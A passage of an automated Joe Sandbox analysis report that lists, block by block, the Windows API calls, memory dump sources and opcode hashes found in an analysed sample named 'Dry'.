                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d6c4089f5fc5b52381ebc5bff76283cd175ed6f2c03e4398c0c452ff4967c289
                                                                                                                                                                                                                                                                                    • Instruction ID: e636cae12ae74e5cc05c2d05474ba55dc4c718d90f4119d5e8ce1fb259aff254
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6c4089f5fc5b52381ebc5bff76283cd175ed6f2c03e4398c0c452ff4967c289
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E61A031208241AFC314DF14C995E3ABBE5FF84348F14859CF49A8B2A2DB35ED46CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B4D7CD,?), ref: 00B4E714
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B4D7CD,?), ref: 00B4E72D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00B4ED8A
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B4EDC3
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4EF02
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4EF1A
                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B4EF67
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6e805c5f94d1480fa824163f08dcad9bedf18a78c8dbb16bd1c3d53a6fd72a36
                                                                                                                                                                                                                                                                                    • Instruction ID: 126c583d7795e26d105c094f254b2e1bf9b9b06b2bcd6466c17f2439f435372e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e805c5f94d1480fa824163f08dcad9bedf18a78c8dbb16bd1c3d53a6fd72a36
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C514FB24083859BD724EB94DC859DBB7ECEF84340F00096EF699D3191EF71E6888766
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B49534
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00B495A5
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00B49604
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B49677
                                                                                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B496A2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0d9060703f014309548aff33c3b78f2b23ce507719231b263d97fc85c0360d66
                                                                                                                                                                                                                                                                                    • Instruction ID: 2d68916d8e26398b148547e281ec12042737c769394804b2796fc849d10580b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d9060703f014309548aff33c3b78f2b23ce507719231b263d97fc85c0360d66
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C513AB5A00619EFCB14CF58C884EAAB7F8FF89314B158599E949DB314E730EA11CF90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B595F3
                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B5961F
                                                                                                                                                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B59677
                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B5969C
                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B596A4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 29ebd58b1604fff85eca8b740fd8a91621209571d772acea368a461b02f1fe23
                                                                                                                                                                                                                                                                                    • Instruction ID: 7da92a5fd441365f0df137d3e255dfaea27408e170eb77262b7567a68d0454b4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29ebd58b1604fff85eca8b740fd8a91621209571d772acea368a461b02f1fe23
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34512C35A00259DFCF05DF65C981AAABBF5FF48314F048098E949AB362CB35ED55CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B6999D
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B69A2D
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B69A49
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B69A8F
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B69AAF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B51A02,?,753CE610), ref: 00AFF9F1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B40354,00000000,00000000,?,?,00B51A02,?,753CE610,?,00B40354), ref: 00AFFA18
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bf962ce94a5c4c54eeebeaeea42d8e25af02d3c01270b10224713e9a83af8048
                                                                                                                                                                                                                                                                                    • Instruction ID: ca3d42c05da649305edeca6dd25bdd811eec74ef83aa8bc5152b6b2b817af34c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf962ce94a5c4c54eeebeaeea42d8e25af02d3c01270b10224713e9a83af8048
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5516C35604245DFCB01DFA9C5849ADBBF4FF09314B0581A8E80AAB762DB35ED86CF91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B7766B
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00B77682
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B776AB
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B5B5BE,00000000,00000000), ref: 00B776D0
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B776FF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7bef6522256d64b7aaf0208b5b5efef617d60e443c52f605286fb681e019bdd3
                                                                                                                                                                                                                                                                                    • Instruction ID: bea4685d8d8a0572acd574a11fa7de81c4d19886b29a55281c8ebabf2e4cf5d7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bef6522256d64b7aaf0208b5b5efef617d60e443c52f605286fb681e019bdd3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241E735648504AFD729CF2CCC48FA57BE5EB05350F1542A4F82DA72E4CB70EE51D650
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f7af80bc1bf1e53cd45ebca270638c656d480991ff0664ff0f7812891ea52e60
                                                                                                                                                                                                                                                                                    • Instruction ID: 070eb62e023cd4516ea6d22826ef968542b5db788d81c80399074928150bf6dc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7af80bc1bf1e53cd45ebca270638c656d480991ff0664ff0f7812891ea52e60
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D172A002009FCB24DF78C881A9EB7E5EF89314F5545E9E615EB391DB31ED51CB80
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AE19E1
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00AE19FE
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0d35880ccd9dcc4650e199c64b63ef3806a67aba52789a4e9ea66f01027af254
                                                                                                                                                                                                                                                                                    • Instruction ID: adf78bd637556be5090c1ab49a1436a4e4864ea0ba42860c318e3bf204590c8c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d35880ccd9dcc4650e199c64b63ef3806a67aba52789a4e9ea66f01027af254
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86417C71A0416ABFDF059F64D884AFEB7B4FF05764F20826AE429A3290C7346E90DB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00B54310
                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B54367
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00B54390
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B5439A
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B543AB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c8eff6c497010df38531658cac83557d9efec05e9c86697e5c00496bd7fc0db3
                                                                                                                                                                                                                                                                                    • Instruction ID: 491a88985d3819a9b0ba6f4f18a3ccc64fa66d178fe289df393765378c4ea04e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8eff6c497010df38531658cac83557d9efec05e9c86697e5c00496bd7fc0db3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A3164705442459FEB358B64D849BB637E8EB1130AF0406F9D8A6871B0EBB494CDCB29
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B42262
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B4230E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00B42316
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B42327
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B4232F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 58f8bba242804c6460e7563d9f84bf26c3630b51b4d70e56fae32aaf507d7ed8
                                                                                                                                                                                                                                                                                    • Instruction ID: a344a5b81cac608a441ca84b2901e22435a5f55fb06b109a48c3dda5f0e56d85
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58f8bba242804c6460e7563d9f84bf26c3630b51b4d70e56fae32aaf507d7ed8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB31B171900219EFDB14CFA8CD89ADE3BB5EF04315F504269FA25A72D0C7B09A44EB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D97D
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00B5D9B4
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5D9F9
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA0D
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B5CC63,00000000), ref: 00B5DA37
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0d7c852c408259c4f4175536ef4388b63892c5a52f1e17041d22a0d9e2ba1b5e
                                                                                                                                                                                                                                                                                    • Instruction ID: 7da754430b03fa1d88db6d47ffe43fa860a6dc456ac4abfbf3e8720be7d0370d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d7c852c408259c4f4175536ef4388b63892c5a52f1e17041d22a0d9e2ba1b5e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49314A71504205EFDB24DFA5D884BABBBF8EF04352B1045AEE94AE3150DB30AE499B60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B761E4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B7623C
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B7624E
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B76259
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B762B5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 35826d46eef3dc3ea77c54ef1437cf5184154cbfaf9e0003e854a77b29dbf92b
                                                                                                                                                                                                                                                                                    • Instruction ID: 357f7d747ea0fef9b6b1c56fa78a63f156b08942409acc0965c8eba378396ff0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35826d46eef3dc3ea77c54ef1437cf5184154cbfaf9e0003e854a77b29dbf92b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C2171759006189ADB219FA4CC84EEE7BF8EF04324F108296FA3DEB181D7B09985CF50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00B613AE
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B613C5
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B61401
                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00B6140D
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00B61445
                                                                                                                                                                                                                                                                                    Memory Dump Source
